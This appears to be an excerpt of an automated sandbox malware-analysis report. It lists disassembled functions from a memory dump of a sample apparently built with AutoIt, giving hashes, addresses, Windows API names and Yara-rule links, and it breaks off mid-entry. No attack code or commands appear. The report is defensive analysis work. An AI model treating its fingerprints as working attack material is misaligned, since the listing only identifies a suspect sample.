                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 2864067406-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 1a3bef3f081372c109b481b3584327cd0323210818abe567890041c97091b183
                                                                                                                                                                                                                                                                                                          • Instruction ID: 341669e06f8f3cdba9279eef3d49f88d08a212e9c4df932beba36426bdf533ab
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a3bef3f081372c109b481b3584327cd0323210818abe567890041c97091b183
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59316036A08A45C5EB60DB16E4543B97760FFC8BA8F15413ADA4D83BA5DF3CD485C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C431AA8 Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 4127811313-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b43e1cc6200736644002785bf2612f5ff520a6a5f4ee2928a3ccc412ddb1b8e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 3e81c8a97d9a73f5abae378160d248779158a6c6445d0f834c6a1eebd2f186d4
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b43e1cc6200736644002785bf2612f5ff520a6a5f4ee2928a3ccc412ddb1b8e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65215C32A08646C6EA20DB15E89056977B0FF88B88F550539EA4D83B59CF7CE480CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C43DADC Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 3970641297-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 28ab5b73c65917a7dd8a5f113cda4927fe1f4d8d92eab68f1c80210d648ebe6f
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2a809f5cc973aefb03598345d110037c15e450b4f34ca5f002ff3cc2c2c829b8
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 28ab5b73c65917a7dd8a5f113cda4927fe1f4d8d92eab68f1c80210d648ebe6f
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2213E72A1D7C58AD7A4CB25E4447AAB7A0FF88794F540139EA8D83B54DF7CD494CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C462E48 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _ctrlfp
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 697997973-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ceb11bdc7e533b6efe9193ca724860c089eef8b0199c88c154fa5b9cecae704e
                                                                                                                                                                                                                                                                                                          • Instruction ID: ca441df067f614e7fe1eaaa559851078b7a1e14b6d49a1d3c8ef6d92f8c7572e
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ceb11bdc7e533b6efe9193ca724860c089eef8b0199c88c154fa5b9cecae704e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9211A72190CD46C1F6619A2D945157B9361FF9A388F644239FBC99BA5DDF2DD4C0CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4E01F8 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ClientRectScreen$InvalidateWindow
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 357397906-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                                                                                                                                                                                                                                                                                                          • Instruction ID: 4cbf7b5d1679e8c2c2ff3f8e9cd7a5c44a676867611242e6ff5a2c00cdd77055
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a25ac5d48612561cfd9a00adcb312ee919544b8dc510f65644f53762853102c
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0821C7B6A04741DEEB40CF78D85459C77B0F748B5CB004826EE5897B18DF78D955CB50
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46B608 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ErrorLast$abort
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1447195878-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                                                                                                                                                                                                                                                                                                          • Instruction ID: fae14bc59991e84b89a5eed5e319f4df63b17bfd23c85590dbc3122c9894a620
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13e5a053fdc59afbd3f437ffbd72ce3def34733e32cc643bca8322f3948ba88d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA012920B09B46C2FE59A735956993D21917F447A8F55843CEA1EC37DEDD2CA888D301
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4E0EAC Relevance: 6.0, APIs: 4, Instructions: 36COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                          • API String ID: 1539411459-0
                                                                                                                                                                                                                                                                                                          • Opcode ID: ed4cd48db317d028437d79ed32fdbf2d4d468542dcded9a22e892753fecea579
                                                                                                                                                                                                                                                                                                          • Instruction ID: fbf5f039e364421a44d92ed3189280c0b49ddd0d06f7d38514d3548e598fa2cd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed4cd48db317d028437d79ed32fdbf2d4d468542dcded9a22e892753fecea579
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D001B131F18791C2E7108B25B808729BBA0BF85BA8F191138EF5943BA1CF7DE490CB00
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46CB08 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 245COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: gfffffff
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-1523873471
                                                                                                                                                                                                                                                                                                          • Opcode ID: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0f1f04f70f9fcc9c4f0dfd14517c0936e9d1eb73e9a648f566a1c5befbfc6aaa
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac7330c79bed4aab57de26e6616dc9dba57b9b2375f82546eba58886a38cf811
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A913863B09B86C6FB218F29D5407A86B65BF15BD8F048139CB8D47399DE3DE141C301
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4A22F8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 200comCOMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          • OleSetContainedObject.OLE32(?,?,?,?,?,?,?,?,?,00007FF68C4A27FF), ref: 00007FF68C4A2538
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: ContainedObject
                                                                                                                                                                                                                                                                                                          • String ID: AutoIt3GUI$Container
                                                                                                                                                                                                                                                                                                          • API String ID: 3565006973-3941886329
                                                                                                                                                                                                                                                                                                          • Opcode ID: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                                                                                                                                                                                                                                                                                                          • Instruction ID: 43884f5aacf157637ec4cecf7069bef28505f9d29e1902f47cf0a502aa9170da
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de2a3a0168e26fee2e40c3ee8b636971f07da2773716e531a72bd8dc4e14313e
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68912376604B46C2DB24CF29E4546AD73A4FB88B98F51803ADF8D83764EF39D899C700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C46CF38 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                                          • String ID: e+000$gfff
                                                                                                                                                                                                                                                                                                          • API String ID: 3215553584-3030954782
                                                                                                                                                                                                                                                                                                          • Opcode ID: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                                                                                                                                                                                                                                                                                                          • Instruction ID: 2767a0d0e97e014f78b8aaf544987c3be6863eeb933f837e63ac3689098b5ba3
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9413e9f027fb7edb937ff8f6307f7599229d27335f94ec4d6bfab0053a1021af
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC511862B1CBC186F7258F3599417696A91FF80B98F089239C79887ADACE2ED485C701
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DA67C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CreateDestroyMessageObjectSendStock
                                                                                                                                                                                                                                                                                                          • String ID: static
                                                                                                                                                                                                                                                                                                          • API String ID: 3467290483-2160076837
                                                                                                                                                                                                                                                                                                          • Opcode ID: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                                                                                                                                                                                                                                                                                                          • Instruction ID: c5b2244792acd65d41c99bf2f4f466de15316025f105d4a3c166e5c9a58871bd
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 65047977eebbc8c03ea8da7fa1849a9fc84c61ba81a5de57a8f8a8a6851eecd5
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D441FB325086C2CAD670DF25E4407AAB7A1FB84794F504239EBA943A99EF7CD481DB40
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4C0DE4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: _snwprintf
                                                                                                                                                                                                                                                                                                          • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                                                                                                                                                                                                                                          • API String ID: 3988819677-2584243854
                                                                                                                                                                                                                                                                                                          • Opcode ID: 32885857382379a4b4f2003679ad0bf2db11e685a1a76c32f342b704b352f53d
                                                                                                                                                                                                                                                                                                          • Instruction ID: 0801c31582d0289ece67ee5d62b47152d9e3d42db8b462d5bbdd00ceb9e1d7a0
                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32885857382379a4b4f2003679ad0bf2db11e685a1a76c32f342b704b352f53d
                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99312976B08B42D5EB10DB61E4506EC2761FF85B88F50403ADA0E97B9ADF38E59AC700
                                                                                                                                                                                                                                                                                                          Function 00007FF68C4DBA9C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                          • Source File: 0000000C.00000002.1602716997.00007FF68C431000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF68C430000, based on PE: true
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602646333.00007FF68C430000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C4E5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602821563.00007FF68C508000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602899369.00007FF68C51E000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          • Associated: 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ff68c430000_Hop.jbxd
                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                          • API ID: Window$CreateMessageObjectSendStock
